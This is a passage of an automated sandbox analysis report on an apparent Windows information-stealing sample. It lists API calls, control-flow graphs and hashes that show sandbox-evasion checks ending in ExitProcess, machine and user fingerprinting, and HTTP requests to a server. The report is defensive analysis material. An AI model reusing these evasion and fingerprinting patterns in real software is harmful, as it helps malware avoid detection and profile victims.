                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00745364
                                                            • lstrlenA.KERNEL32(00000000), ref: 00745383
                                                            • strtok.MSVCRT(00000000,?), ref: 0074539E
                                                            • lstrlenA.KERNEL32(00000000), ref: 007453AE
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                            • API String ID: 3532888709-1526165396
                                                            • Opcode ID: d1a6d7a3da220d2c3299cc8ded9df31d33b604ae6ca26933cdb3d67c989b3cbb
                                                            • Instruction ID: 20cddf9eb6b06456f989c3c887f8560e29d291f50e7def6b90c59830b1ef22ea
                                                            • Opcode Fuzzy Hash: d1a6d7a3da220d2c3299cc8ded9df31d33b604ae6ca26933cdb3d67c989b3cbb
                                                            • Instruction Fuzzy Hash: 84512E70954148EBEB18FF60CD9AAED7779EF50305F504028F80A5B192EF386B45CB62

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1404 747500-74754a GetWindowsDirectoryA 1405 747553-7475c7 GetVolumeInformationA call 748d00 * 3 1404->1405 1406 74754c 1404->1406 1413 7475d8-7475df 1405->1413 1406->1405 1414 7475e1-7475fa call 748d00 1413->1414 1415 7475fc-747617 GetProcessHeap HeapAlloc 1413->1415 1414->1413 1416 747628-747658 wsprintfA call 74a740 1415->1416 1417 747619-747626 call 74a740 1415->1417 1425 74767e-74768e 1416->1425 1417->1425
                                                            APIs
                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00747542
                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074757F
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747603
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0074760A
                                                            • wsprintfA.USER32 ref: 00747640
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                            • String ID: :$C$\
                                                            • API String ID: 3790021787-3809124531
                                                            • Opcode ID: 1aaa221617ebd7d13cdb5689b00eab069ca6bbbf3411f64960102b5abaab6e1a
                                                            • Instruction ID: 23b634493e773334394aa06b5a73aa5c6b395422f22b088f494553b94769600f
                                                            • Opcode Fuzzy Hash: 1aaa221617ebd7d13cdb5689b00eab069ca6bbbf3411f64960102b5abaab6e1a
                                                            • Instruction Fuzzy Hash: 8D4182B1D04248EBDB14DF94DC49BEEBBB8EF48704F104199F5096B280D7786A84CFA6

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2CB0), ref: 007498A1
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2DA0), ref: 007498BA
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2B78), ref: 007498D2
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2DE8), ref: 007498EA
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2D28), ref: 00749903
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC1538), ref: 0074991B
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FBAC68), ref: 00749933
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FBACE8), ref: 0074994C
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2CE0), ref: 00749964
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2D40), ref: 0074997C
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2C08), ref: 00749995
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2B48), ref: 007499AD
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FBAD28), ref: 007499C5
                                                              • Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2BD8), ref: 007499DE
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 007311D0: ExitProcess.KERNEL32 ref: 00731211
                                                              • Part of subcall function 00731160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00746A17,00750AEF), ref: 0073116A
                                                              • Part of subcall function 00731160: ExitProcess.KERNEL32 ref: 0073117E
                                                              • Part of subcall function 00731110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00746A1C), ref: 0073112B
                                                              • Part of subcall function 00731110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00746A1C), ref: 00731132
                                                              • Part of subcall function 00731110: ExitProcess.KERNEL32 ref: 00731143
                                                              • Part of subcall function 00731220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0073123E
                                                              • Part of subcall function 00731220: __aulldiv.LIBCMT ref: 00731258
                                                              • Part of subcall function 00731220: __aulldiv.LIBCMT ref: 00731266
                                                              • Part of subcall function 00731220: ExitProcess.KERNEL32 ref: 00731294
                                                              • Part of subcall function 00746770: GetUserDefaultLangID.KERNEL32(?,?,00746A26,00750AEF), ref: 00746774
                                                            • GetUserDefaultLCID.KERNEL32 ref: 00746A26
                                                              • Part of subcall function 00731190: ExitProcess.KERNEL32 ref: 007311C6
                                                              • Part of subcall function 00747850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
                                                              • Part of subcall function 00747850: HeapAlloc.KERNEL32(00000000,?,?,?,007311B7), ref: 00747887
                                                              • Part of subcall function 00747850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
                                                              • Part of subcall function 007478E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00746A2B), ref: 00747910
                                                              • Part of subcall function 007478E0: HeapAlloc.KERNEL32(00000000,?,?,?,00746A2B), ref: 00747917
                                                              • Part of subcall function 007478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FC1558,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746ACA
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00746AE8
                                                            • CloseHandle.KERNEL32(00000000), ref: 00746AF9
                                                            • Sleep.KERNEL32(00001770), ref: 00746B04
                                                            • CloseHandle.KERNEL32(?,00000000,?,00FC1558,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746B1A
                                                            • ExitProcess.KERNEL32 ref: 00746B22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 3511611419-0
                                                            • Opcode ID: a4c3a082021ee2928e9e3d8e5b5911388e16186d1a6c02c5edb5a88e3cf49f8c
                                                            • Instruction ID: 3c962c896f51c683667334b0e0a514eb7053d6094ae2cee60751391bf8477403
                                                            • Opcode Fuzzy Hash: a4c3a082021ee2928e9e3d8e5b5911388e16186d1a6c02c5edb5a88e3cf49f8c
                                                            • Instruction Fuzzy Hash: F1312B71A54208FAEB05FBF0DC5ABFE7778AF44301F504528F612A2192DF786945C6A2

                                                            Control-flow Graph

                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
                                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??2@$CrackInternetlstrlen
                                                            • String ID: <
                                                            • API String ID: 1683549937-4251816714
                                                            • Opcode ID: b64e0f8979ed0cac290d77c352e8e7ad958330ed724bed06d06418289be69903
                                                            • Instruction ID: 3b381c178e7d2400591628095e20210c11e3e26a4d249809ea655383d6cd1658
                                                            • Opcode Fuzzy Hash: b64e0f8979ed0cac290d77c352e8e7ad958330ed724bed06d06418289be69903
                                                            • Instruction Fuzzy Hash: 902118B1D00209ABDF14DFA4E849ADD7B74FB44320F108225F925A7290EB746A05CF91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1491 731220-731247 call 7489b0 GlobalMemoryStatusEx 1494 731273-73127a 1491->1494 1495 731249-731271 call 74da00 * 2 1491->1495 1497 731281-731285 1494->1497 1495->1497 1499 731287 1497->1499 1500 73129a-73129d 1497->1500 1502 731292-731294 ExitProcess 1499->1502 1503 731289-731290 1499->1503 1503->1500 1503->1502
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0073123E
                                                            • __aulldiv.LIBCMT ref: 00731258
                                                            • __aulldiv.LIBCMT ref: 00731266
                                                            • ExitProcess.KERNEL32 ref: 00731294
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                            • String ID: @
                                                            • API String ID: 3404098578-2766056989
                                                            • Opcode ID: 0de3474a3a94c2950dfc23839dde7378338412f4c76bca19ada8c88e6b523c11
                                                            • Instruction ID: 09b175ffe8ae989d59285de05c75f9a5f4d4f98636c2d294dc9a01ef0cc37a9c
                                                            • Opcode Fuzzy Hash: 0de3474a3a94c2950dfc23839dde7378338412f4c76bca19ada8c88e6b523c11
                                                            • Instruction Fuzzy Hash: 05011DB0E44308FAEB10EFE4CC49BAEBB78BB54705F608048E705B62C2D77859458799

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1505 746af3 1506 746b0a 1505->1506 1508 746b0c-746b22 call 746920 call 745b10 CloseHandle ExitProcess 1506->1508 1509 746aba-746ad7 call 74aad0 OpenEventA 1506->1509 1515 746af5-746b04 CloseHandle Sleep 1509->1515 1516 746ad9-746af1 call 74aad0 CreateEventA 1509->1516 1515->1506 1516->1508
                                                            APIs
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FC1558,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746ACA
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00746AE8
                                                            • CloseHandle.KERNEL32(00000000), ref: 00746AF9
                                                            • Sleep.KERNEL32(00001770), ref: 00746B04
                                                            • CloseHandle.KERNEL32(?,00000000,?,00FC1558,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746B1A
                                                            • ExitProcess.KERNEL32 ref: 00746B22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                            • String ID:
                                                            • API String ID: 941982115-0
                                                            • Opcode ID: e0808568fd3b39c2d53992ed5299e8173511c8f9c2dac56e3c19d5d2c1f2e8c5
                                                            • Instruction ID: c86c5ed664a4b292961808e48201069c8dd12d068c3612c546b36204b14078f6
                                                            • Opcode Fuzzy Hash: e0808568fd3b39c2d53992ed5299e8173511c8f9c2dac56e3c19d5d2c1f2e8c5
                                                            • Instruction Fuzzy Hash: 07F08CB0A44219EFE700BBA0DC0ABBE7B74FB05701F208914F517E11C1CBB85980EAA7
                                                            APIs
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 00736280: InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
                                                              • Part of subcall function 00736280: StrCmpCA.SHLWAPI(?,00FCD800), ref: 00736303
                                                              • Part of subcall function 00736280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
                                                              • Part of subcall function 00736280: HttpOpenRequestA.WININET(00000000,GET,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00736385
                                                              • Part of subcall function 00736280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
                                                              • Part of subcall function 00736280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745228
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                            • String ID: ERROR$ERROR
                                                            • API String ID: 3287882509-2579291623
                                                            • Opcode ID: 9de274fdab7c37d941dd4e74f3ac58120f82581ee76c71d32b14f6309a566074
                                                            • Instruction ID: 55f0343d3ab0633f3c8879b8e0510179efe92ed3a876b5dff0e89ad16d8747e0
                                                            • Opcode Fuzzy Hash: 9de274fdab7c37d941dd4e74f3ac58120f82581ee76c71d32b14f6309a566074
                                                            • Instruction Fuzzy Hash: 50113070954108FBEB14FF60DD5AAED7378AF50300F808168F81A4B593EF78AB05CA92
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00746A2B), ref: 00747910
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00746A2B), ref: 00747917
                                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocComputerNameProcess
                                                            • String ID:
                                                            • API String ID: 4203777966-0
                                                            • Opcode ID: ee6799184f4c620852192f5ce842fb059cabfd293b4a98872a55dce56dbe9be5
                                                            • Instruction ID: 4bf99e4a2162ace0dee3c91cc3f3181fdbd530fd35d86be21e1fcf2fccb23127
                                                            • Opcode Fuzzy Hash: ee6799184f4c620852192f5ce842fb059cabfd293b4a98872a55dce56dbe9be5
                                                            • Instruction Fuzzy Hash: 6001A9B1A48204EFC714DF94DD45BAEBBB8F744B11F104259F945E3380D3785944CBA2
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00746A1C), ref: 0073112B
                                                            • VirtualAllocExNuma.KERNEL32(00000000,?,?,00746A1C), ref: 00731132
                                                            • ExitProcess.KERNEL32 ref: 00731143
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$AllocCurrentExitNumaVirtual
                                                            • String ID:
                                                            • API String ID: 1103761159-0
                                                            • Opcode ID: fda138dc8707a486fb32e22746b73f1118ac211c58c3760a706bf05db238c3a5
                                                            • Instruction ID: ea235291968408c753d9373cbc1c96bf51099d91a7eed52d787dfea0e9e7e105
                                                            • Opcode Fuzzy Hash: fda138dc8707a486fb32e22746b73f1118ac211c58c3760a706bf05db238c3a5
                                                            • Instruction Fuzzy Hash: 14E0867195930CFBE7106BA09C0EB4C7778AB44B02F500054F70C761C0D6B42640A69A
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0073114E,?,?,00746A1C), ref: 007310B3
                                                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0073114E,?,?,00746A1C), ref: 007310F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID:
                                                            • API String ID: 2087232378-0
